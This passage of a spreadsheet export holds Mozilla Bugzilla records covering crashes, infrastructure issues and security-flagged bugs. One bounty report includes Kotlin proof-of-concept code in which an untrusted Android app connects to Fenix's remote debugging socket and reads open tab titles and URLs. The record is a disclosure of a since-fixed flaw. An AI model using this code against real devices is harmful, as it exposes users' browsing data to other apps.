 	xpc3250.dll!XPCWrappedNative::CallMethod(XPCCallContext &amp; ccx={...}, XPCWrappedNative::CallMode mode=17)  Line 2393 + 0x21 bytes	C++
 	xpc3250.dll!XPCWrappedNative::CallMethod(XPCCallContext &amp; ccx={...}, XPCWrappedNative::CallMode mode=CALL_METHOD)  Line 2393 + 0x21 bytes	C++
 	xpc3250.dll!XPC_WN_CallMethod(JSContext * cx=0x04d2a5d8, JSObject * obj=0x023000e0, unsigned int argc=1, long * argv=0x034935d0, long * vp=0x0012ede8)  Line 1473 + 0xe bytes	C++
 	js3250.dll!js_Invoke(JSContext * cx=0x04d2a5d8, unsigned int argc=1, long * vp=0x034935c8, unsigned int flags=2)  Line 1297 + 0x20 bytes	C
 	js3250.dll!js_Interpret(JSContext * cx=0x04d2a5d8)  Line 4852 + 0x16 bytes	C
 	js3250.dll!js_Invoke(JSContext * cx=0x04d2a5d8, unsigned int argc=1, long * vp=0x034935b8, unsigned int flags=0)  Line 1313 + 0x9 bytes	C
 	js3250.dll!js_InternalInvoke(JSContext * cx=0x04d2a5d8, JSObject * obj=0x02232900, long fval=36766528, unsigned int flags=0, unsigned int argc=1, long * argv=0x04dd0e38, long * rval=0x0012f628)  Line 1369 + 0x15 bytes	C
 	js3250.dll!JS_CallFunctionValue(JSContext * cx=0x04d2a5d8, JSObject * obj=0x02232900, long fval=36766528, unsigned int argc=1, long * argv=0x04dd0e38, long * rval=0x0012f628)  Line 5054 + 0x1f bytes	C
 	gklayout.dll!nsJSContext::CallEventHandler(nsISupports * aTarget=0x04a88358, void * aScope=0x02232900, void * aHandler=0x02310340, nsIArray * aargv=0x04f5d474, nsIVariant * * arv=0x0012f6e0)  Line 1962 + 0x24 bytes	C++
 	gklayout.dll!nsGlobalWindow::RunTimeout(nsTimeout * aTimeout=0x04d66228)  Line 7897 + 0xab bytes	C++
 	gklayout.dll!nsGlobalWindow::TimerCallback(nsITimer * aTimer=0x04b1a468, void * aClosure=0x04d66228)  Line 8231	C++
 	xpcom_core.dll!nsTimerImpl::Fire()  Line 400 + 0xe bytes	C++
 	xpcom_core.dll!nsTimerEvent::Run()  Line 492	C++
 	xpcom_core.dll!nsThread::ProcessNextEvent(int mayWait=1, int * result=0x0012f848)  Line 511	C++
 	xpcom_core.dll!NS_ProcessNextEvent_P(nsIThread * thread=0x012b4068, int mayWait=1)  Line 227 + 0x16 bytes	C++
 	gkwidget.dll!nsBaseAppShell::Run()  Line 170 + 0xc bytes	C++
 	tkitcmps.dll!nsAppStartup::Run()  Line 181 + 0x1c bytes	C++
 	xul.dll!XRE_main(int argc=1, char * * argv=0x003ff7c0, const nsXREAppData * aAppData=0x003ffe68)  Line 3170 + 0x25 bytes	C++
 	firefox.exe!NS_internal_main(int argc=1, char * * argv=0x003ff7c0)  Line 158 + 0x12 bytes	C++
 	firefox.exe!wmain(int argc=1, unsigned short * * argv=0x003fa080)  Line 87 + 0xd bytes	C++
 	firefox.exe!__tmainCRTStartup()  Line 583 + 0x19 bytes	C
 	firefox.exe!wmainCRTStartup()  Line 403	C
 	kernel32.dll!_BaseProcessStart@4()  + 0x23 bytes</t>
        </is>
      </c>
      <c r="X3835" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3836">
      <c r="A3836" t="n">
        <v>1658865</v>
      </c>
      <c r="B3836" t="inlineStr">
        <is>
          <t>2020-08-12 21:06:14 -0700</t>
        </is>
      </c>
      <c r="C3836" t="inlineStr">
        <is>
          <t>Untrusted apps can connect Fenix's remote debugging socket on older Android devices</t>
        </is>
      </c>
      <c r="D3836" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:56 -0700</t>
        </is>
      </c>
      <c r="E3836" t="n">
        <v>1</v>
      </c>
      <c r="F3836" t="n">
        <v>1</v>
      </c>
      <c r="G3836" t="n">
        <v>2</v>
      </c>
      <c r="H3836" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3836" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J3836" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3836" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3836" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3836" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3836" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3836" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3836" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main83+]</t>
        </is>
      </c>
      <c r="Q3836" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3836" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3836" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3836" t="n">
        <v>1</v>
      </c>
      <c r="U3836" t="n">
        <v>0</v>
      </c>
      <c r="V3836" t="n">
        <v>12</v>
      </c>
      <c r="W3836" t="inlineStr">
        <is>
          <t>Created attachment 9169750
remote_debug.gif
I'm not sure whether this is a security bug or by design (i.e., already considered &amp; accepted risk), but Fenix's remote debugging socket can be connected from untrusted apps if Android OS version is older than 6.
When user enables "Remote debbuging via USB", Fenix creates an unix domain socket that name is `firefox-debugger-socket`. That socket is not explicitly protected by Fenix itself but it's not connectable from untrusted apps because unix sockets are banned by Android's SELinux policy (below).
https://android.googlesource.com/platform/external/sepolicy/+/57531cacb40682be4b1189c721fd1e7f25bf3786/untrusted_app.te#137
But the SELinux policy was enforced from Android version 6.0 (Marshmallow).
Android older than 6.0 (such as 5.1 Lollipop) allows to use them without any permissions.
As you know Android 5.1 is very old, but still they has about 8% share. Also Mozilla website clearly mentions that Firefox is compatible with Android 4.1 or above devices (below).
https://support.mozilla.org/en-US/kb/will-firefox-work-my-mobile-device#mobile::m79
If so, in order to protect the debugger socket, there should be some protections in Fenix itself, for example, hiding "Remote debbuging via USB" button on old devices.
The following Kotlin code can reproduce this issue on Nexus 6 emulator with Android 5.1 stock image. See also attached animation gif for the demo.
```
var socket = LocalSocket()
var addr = LocalSocketAddress("org.mozilla.fenix/firefox-debugger-socket")
socket.connect(addr)
Toast.makeText(applicationContext, "Connected", Toast.LENGTH_SHORT).show()
var reader: Scanner = Scanner(socket.getInputStream())
var writer: OutputStream = socket.getOutputStream()
reader.nextLine()
// List tab request
var req = "48:{\"type\":\"listTabs\",\"favicons\":false,\"to\":\"root\"}"
writer.write((req + '\n').toByteArray(Charset.defaultCharset()))
// Parse response
var resp = reader.nextLine().toString()
var index = resp.indexOf("{", 0)
var tabs = JSONObject(resp.substring(index)).getJSONArray("tabs")
// Show tab info
for(i in 0 until tabs.length()) {
    var tab = tabs.getJSONObject(i)
    var outerWindowID = tab.getInt("outerWindowID")
    var title = tab.getString("title")
    var url = tab.getString("url")
    var output = "#${i+1} Window ID: ${outerWindowID}\nTitle: ${title}\n URL: ${url}"
    Toast.makeText(applicationContext, output, Toast.LENGTH_LONG).show()
}
socket.close()
```</t>
        </is>
      </c>
      <c r="X3836" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3837">
      <c r="A3837" t="n">
        <v>1507449</v>
      </c>
      <c r="B3837" t="inlineStr">
        <is>
          <t>2018-11-15 03:43:20 -0800</t>
        </is>
      </c>
      <c r="C3837" t="inlineStr">
        <is>
          <t>"Open in test results viewer" links to a page that never fully loads</t>
        </is>
      </c>
      <c r="D3837" t="inlineStr">
        <is>
          <t>2018-12-09 11:33:24 -0800</t>
        </is>
      </c>
      <c r="E3837" t="n">
        <v>1</v>
      </c>
      <c r="F3837" t="n">
        <v>1</v>
      </c>
      <c r="G3837" t="n">
        <v>7</v>
      </c>
      <c r="H3837" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3837" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3837" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K3837" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3837" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3837" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3837" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3837" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3837" t="inlineStr"/>
      <c r="Q3837" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3837" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3837" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3837" t="n">
        <v>1</v>
      </c>
      <c r="U3837" t="n">
        <v>0</v>
      </c>
      <c r="V3837" t="n">
        <v>6</v>
      </c>
      <c r="W3837" t="inlineStr">
        <is>
          <t>Some jobs have a "open in test results viewer" link in their list of job artifacts. eg:
"""
artifact uploaded: log_raw.log - open in test results viewer
"""
Where `log_raw.log` links to:
https://queue.taskcluster.net/v1/task/P8g7sSw4QauPX40hpc-4Vg/runs/0/artifacts/public/logs/log_raw.log
...and `open in test results viewer` links to:
https://mozilla.github.io/wptview/#/?urls=https%3A%2F%2Fqueue.taskcluster.net%2Fv1%2Ftask%2FP8g7sSw4QauPX40hpc-4Vg%2Fruns%2F0%2Fartifacts%2Fpublic%2Flogs%2Flog_raw.log
The latter results in a page that never fully loads (spinner remains).
The link itself comes from:
https://github.com/mozilla/treeherder/blob/cb8eb20b7b044378907f288ce6e678f2b5913d56/ui/shared/JobDetails.jsx#L35-L40
James, is the WPT viewer broken / should we still link to it?</t>
        </is>
      </c>
      <c r="X3837" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3838">
      <c r="A3838" t="n">
        <v>23611</v>
      </c>
      <c r="B3838" t="inlineStr">
        <is>
          <t>2000-01-10 21:28:06 -0800</t>
        </is>
      </c>
      <c r="C3838" t="inlineStr">
        <is>
          <t>{css2} Absolutely positioned FIELDSET element cause app to crash</t>
        </is>
      </c>
      <c r="D3838" t="inlineStr">
        <is>
          <t>2000-05-31 13:16:29 -0700</t>
        </is>
      </c>
      <c r="E3838" t="n">
        <v>1</v>
      </c>
      <c r="F3838" t="n">
        <v>1</v>
      </c>
      <c r="G3838" t="n">
        <v>3</v>
      </c>
      <c r="H3838" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3838" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3838" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K3838" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3838" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3838" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3838" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3838" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3838" t="inlineStr"/>
      <c r="Q3838" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3838" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3838" t="inlineStr">
        <is>
          <t>M15</t>
        </is>
      </c>
      <c r="T3838" t="n">
        <v>1</v>
      </c>
      <c r="U3838" t="n">
        <v>0</v>
      </c>
      <c r="V3838" t="n">
        <v>12</v>
      </c>
      <c r="W3838" t="inlineStr">
        <is>
          <t>Using the following builds:
Win 95: 2000-01-05-16
Win NT: 2000-01-05-16
Win 98: 2000-01-10-09
Linux Red Hat 6.0 (Linux 2.2): 2000-01-07-08
Mac 8.5: 2000-01-05-15
Steps to reproduce:
1. Open attached file in 5.0. Document consists of an absolutely positioned
FIELDSET element. Here is the code:
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" &gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Fieldset&lt;/title&gt;
&lt;style type="text/css"&gt;
fieldset {
	position: absolute;
	top: 50px;
	left: 50px;
	height: 200px;
	width: 200px;
	background-color: lime
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;fieldset&gt;Fieldset&lt;/fieldset&gt;
&lt;/body&gt;
&lt;/html&gt;
2. Application crashes with the following details (Talkback incident #1665557):
MOZILLA caused an invalid page fault in
module GKHTML.DLL at 014f:00fa646b.
Registers:
EAX=00000000 CS=014f EIP=00fa646b EFLGS=00010206
EBX=00000000 SS=0157 ESP=0063e91c EBP=0063e928
ECX=0063e9fc DS=0157 ESI=0063e950 FS=4ca7
EDX=00000000 ES=0157 EDI=0063ecac GS=0000
Bytes at CS:EIP:
8b 08 ff 77 04 ff 37 50 ff 51 10 8b 46 0c 8d 56
Stack dump:
0063eec8 0063ec68 019cdfa0 0063eb2c 00fa6f27 0063ec68 02537140 019cdfa0 0063eec8
00000000 0063eec8 019cdfa0 00000000 019cdfa0 02537140 0063ec68
Crash is across platform. Unable to get call stack - will try tomorrow.</t>
        </is>
      </c>
      <c r="X3838" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3839">
      <c r="A3839" t="n">
        <v>1879093</v>
      </c>
      <c r="B3839" t="inlineStr">
        <is>
          <t>2024-02-07 05:56:41 -0800</t>
        </is>
      </c>
      <c r="C3839" t="inlineStr">
        <is>
          <t>Firefox crashes with two open Meet tabs and taking my AirPods out</t>
        </is>
      </c>
      <c r="D3839" t="inlineStr">
        <is>
          <t>2024-09-18 19:41:08 -0700</t>
        </is>
      </c>
      <c r="E3839" t="n">
        <v>1</v>
      </c>
      <c r="F3839" t="n">
        <v>1</v>
      </c>
      <c r="G3839" t="n">
        <v>3</v>
      </c>
      <c r="H3839" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3839" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3839" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K3839" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3839" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M3839" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3839" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3839" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3839" t="inlineStr">
        <is>
          <t>[adv-main126+]</t>
        </is>
      </c>
      <c r="Q3839" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3839" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3839" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T3839" t="n">
        <v>1</v>
      </c>
      <c r="U3839" t="n">
        <v>0</v>
      </c>
      <c r="V3839" t="n">
        <v>12</v>
      </c>
      <c r="W3839" t="inlineStr">
        <is>
          <t>STR (require AirPods or possibly similar bluetooth headset):
1. Leave already-paired AirPods in their case
2. Go to https://meet.google.com/
3. Click New Meeting / Start an instant meeting
4. Allow camera and microphone and stay in the lobby
5. Duplicate the tab and repeat step 4 there.
6. Make macOS connect with the AirPods by taking them out of their case
Expected result: No crash
Actual result: Firefox crashes with bp-e86fd0af-cf11-49db-883f-ad3010240206
If it doesn't crash in in step 6, put the airpods back in their case (sometimes crashes then) and repeat step 6.</t>
        </is>
      </c>
      <c r="X3839" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3840">
      <c r="A3840" t="n">
        <v>348049</v>
      </c>
      <c r="B3840" t="inlineStr">
        <is>
          <t>2006-08-09 09:52:46 -0700</t>
        </is>
      </c>
      <c r="C3840" t="inlineStr">
        <is>
          <t>[FIX]Frames not destroyed with this XBL + &lt;td&gt; testcase</t>
        </is>
      </c>
      <c r="D3840" t="inlineStr">
        <is>
          <t>2007-12-18 08:24:33 -0800</t>
        </is>
      </c>
      <c r="E3840" t="n">
        <v>1</v>
      </c>
      <c r="F3840" t="n">
        <v>1</v>
      </c>
      <c r="G3840" t="n">
        <v>3</v>
      </c>
      <c r="H3840" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3840" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3840" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K3840" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3840" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3840" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3840" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q3840" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3840" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3840" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T3840" t="n">
        <v>1</v>
      </c>
      <c r="U3840" t="n">
        <v>0</v>
      </c>
      <c r="V3840" t="n">
        <v>15</v>
      </c>
      <c r="W3840" t="inlineStr">
        <is>
          <t>1. Load either testcase.
Result: ###!!! ASSERTION: unsupported operation: 'PR_FALSE', nsTableCellFrame::AppendFrames
2. Reload.
Result: Assuming the patch from 334514 is applied, you'll see another assertion: "Some frame destructors were not called".
Result: If you're using the crashing testcase, you're likely to see a crash attempting to dereference 0xdadadaf6.</t>
        </is>
      </c>
      <c r="X3840" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3841">
      <c r="A3841" t="n">
        <v>425576</v>
      </c>
      <c r="B3841" t="inlineStr">
        <is>
          <t>2008-03-27 18:29:20 -0700</t>
        </is>
      </c>
      <c r="C3841" t="inlineStr">
        <is>
          <t>Crash on login to Excite Japan Blog (exblog.jp) after updating to Firefox 2.0.0.13 [@ js_MarkGCThing]</t>
        </is>
      </c>
      <c r="D3841" t="inlineStr">
        <is>
          <t>2013-03-19 07:07:34 -0700</t>
        </is>
      </c>
      <c r="E3841" t="n">
        <v>1</v>
      </c>
      <c r="F3841" t="n">
        <v>1</v>
      </c>
      <c r="G3841" t="n">
        <v>3</v>
      </c>
      <c r="H3841" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3841" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3841" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3841" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3841" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3841" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3841" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3841" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3841" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3841" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3841" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3841" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3841" t="n">
        <v>1</v>
      </c>
      <c r="U3841" t="n">
        <v>0</v>
      </c>
      <c r="V3841" t="n">
        <v>48</v>
      </c>
      <c r="W3841" t="inlineStr">
        <is>
          <t>Some Japanese users reported that they have encountered crashes on login to Excite Blog &lt;http://www.exblog.jp/&gt; after updating to Firefox 2.0.0.13.
http://forums.mozillazine.jp/viewtopic.php?t=7215
http://takublog.exblog.jp/7581761/
http://asfradio.exblog.jp/8538149/
http://sanggar.exblog.jp/6943437/
http://ddrer.exblog.jp/7736962/
http://th69.exblog.jp/7574222/
http://runtotorun.exblog.jp/7735841/
- error message says: The instruction at "0x600f0290" referenced memory at "0x000013e8". The Memory could not be "read". Click OK to terminate the application.
- both on Windows and Mac
- no problem with the "secure mode login" (with SSL)
- no problem when login from the home page, crash when login form "login" links on each blogs</t>
        </is>
      </c>
      <c r="X3841" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3842">
      <c r="A3842" t="n">
        <v>1513276</v>
      </c>
      <c r="B3842" t="inlineStr">
        <is>
          <t>2018-12-11 08:59:38 -0800</t>
        </is>
      </c>
      <c r="C3842" t="inlineStr">
        <is>
          <t>Mass upgrade repos to sparserevlog</t>
        </is>
      </c>
      <c r="D3842" t="inlineStr">
        <is>
          <t>2022-10-18 11:17:02 -0700</t>
        </is>
      </c>
      <c r="E3842" t="n">
        <v>1</v>
      </c>
      <c r="F3842" t="n">
        <v>1</v>
      </c>
      <c r="G3842" t="n">
        <v>5</v>
      </c>
      <c r="H3842" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3842" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J3842" t="inlineStr">
        <is>
          <t>Mercurial: hg.mozilla.org</t>
        </is>
      </c>
      <c r="K3842" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3842" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3842" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3842" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3842" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3842" t="inlineStr"/>
      <c r="Q3842" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3842" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3842" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3842" t="n">
        <v>1</v>
      </c>
      <c r="U3842" t="n">
        <v>0</v>
      </c>
      <c r="V3842" t="n">
        <v>15</v>
      </c>
      <c r="W3842" t="inlineStr">
        <is>
          <t>Mercurial 4.9 makes the "sparserevlog" repository feature enabled by default. This incremental improvement to revlog storage makes delta chains shorter (by trading I/O reads across larger distances). This makes revlogs smaller and makes fulltext revision reading faster. See https://www.mercurial-scm.org/repo/hg/rev/3764330f76a6 for performance numbers.
At some point after Mercurial 4.9 is released, we should mass upgrade repos on hg.mozilla.org to use it. This will be similar to what we did in bug 1351859.
Note: upgrading the repos will mean legacy clients won't be able to "stream clone." This could have adverse impact on CI, which has historically used stream clone heavily.</t>
        </is>
      </c>
      <c r="X3842" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3843">
      <c r="A3843" t="n">
        <v>1700690</v>
      </c>
      <c r="B3843" t="inlineStr">
        <is>
          <t>2021-03-24 10:39:23 -0700</t>
        </is>
      </c>
      <c r="C3843" t="inlineStr">
        <is>
          <t>WasmIonCompile multi-value return can clobber stack with f32 writes (was: Crash [@ ??] with WebAssembly on 32-bit)</t>
        </is>
      </c>
      <c r="D3843" t="inlineStr">
        <is>
          <t>2021-11-29 13:56:30 -0800</t>
        </is>
      </c>
      <c r="E3843" t="n">
        <v>1</v>
      </c>
      <c r="F3843" t="n">
        <v>1</v>
      </c>
      <c r="G3843" t="n">
        <v>3</v>
      </c>
      <c r="H3843" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3843" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3843" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K3843" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3843" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3843" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3843" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3843" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3843" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main88+r] [adv-esr78.10+r]</t>
        </is>
      </c>
      <c r="Q3843" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3843" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3843" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T3843" t="n">
        <v>1</v>
      </c>
      <c r="U3843" t="n">
        <v>0</v>
      </c>
      <c r="V3843" t="n">
        <v>27</v>
      </c>
      <c r="W3843" t="inlineStr">
        <is>
          <t>The attached testcase crashes on mozilla-central revision 3be60f42358a (build with --target=i686-pc-linux-gnu --enable-gczeal --enable-optimize --enable-debug --enable-fuzzing, run with --no-threads --fuzzing-safe --baseline-warmup-threshold=0 --disable-oom-functions test.js). 
Backtrace:
    ==26528==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x00000010 (pc 0x41b4d933 bp 0xffd8cac8 sp 0xffd8cac8 T26528)
    ==26528==The signal is caused by a READ memory access.
    ==26528==Hint: address points to the zero page.
        #0 0x41b4d932  (&lt;unknown module&gt;)
This is essentially a crash on the heap with a near-null deref. 32-bit only, marking s-s until investigated.</t>
        </is>
      </c>
      <c r="X3843" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3844">
      <c r="A3844" t="n">
        <v>474240</v>
      </c>
      <c r="B3844" t="inlineStr">
        <is>
          <t>2009-01-18 16:12:57 -0800</t>
        </is>
      </c>
      <c r="C3844" t="inlineStr">
        <is>
          <t>this._targetMenu.removeAllItems is not a function and SnowlDatastore is not defined after subscribing to planet.mozilla.org</t>
        </is>
      </c>
      <c r="D3844" t="inlineStr">
        <is>
          <t>2009-02-23 10:39:05 -0800</t>
        </is>
      </c>
      <c r="E3844" t="n">
        <v>1</v>
      </c>
      <c r="F3844" t="n">
        <v>1</v>
      </c>
      <c r="G3844" t="n">
        <v>6</v>
      </c>
      <c r="H3844" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3844" t="inlineStr">
        <is>
          <t>Mozilla Labs</t>
        </is>
      </c>
      <c r="J3844" t="inlineStr">
        <is>
          <t>Snowl</t>
        </is>
      </c>
      <c r="K3844" t="inlineStr">
        <is>
          <t>0.2</t>
        </is>
      </c>
      <c r="L3844" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3844" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3844" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3844" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3844" t="inlineStr"/>
      <c r="Q3844" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3844" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3844" t="inlineStr">
        <is>
          <t>0.3</t>
        </is>
      </c>
      <c r="T3844" t="n">
        <v>1</v>
      </c>
      <c r="U3844" t="n">
        <v>0</v>
      </c>
      <c r="V3844" t="n">
        <v>5</v>
      </c>
      <c r="W3844" t="inlineStr">
        <is>
          <t>1. Go to http://planet.mozilla.org
2. Click the feed icon in the location bar.
3. Press 'Ok' in the subscribe dialog with SNowl already selected.
Error: this._targetMenu.removeAllItems is not a function
Source file: chrome://snowl/content/write.js
Line: 150
Error: SnowlDatastore is not defined
Source file: chrome://snowl/content/collections.js
Line: 253</t>
        </is>
      </c>
      <c r="X3844" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3845">
      <c r="A3845" t="n">
        <v>1667200</v>
      </c>
      <c r="B3845" t="inlineStr">
        <is>
          <t>2020-09-24 12:53:30 -0700</t>
        </is>
      </c>
      <c r="C3845" t="inlineStr">
        <is>
          <t>Perma tier 2 0:10.95 taskcluster/taskgraph/test/test_optimize_strategies.py::test_project_autoland_test TEST-UNEXPECTED-FAIL</t>
        </is>
      </c>
      <c r="D3845" t="inlineStr">
        <is>
          <t>2020-09-27 23:27:49 -0700</t>
        </is>
      </c>
      <c r="E3845" t="n">
        <v>1</v>
      </c>
      <c r="F3845" t="n">
        <v>1</v>
      </c>
      <c r="G3845" t="n">
        <v>7</v>
      </c>
      <c r="H3845" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3845" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3845" t="inlineStr">
        <is>
          <t>Task Configuration</t>
        </is>
      </c>
      <c r="K3845" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3845" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3845" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3845" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3845" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3845" t="inlineStr"/>
      <c r="Q3845" t="inlineStr">
        <is>
          <t>P5</t>
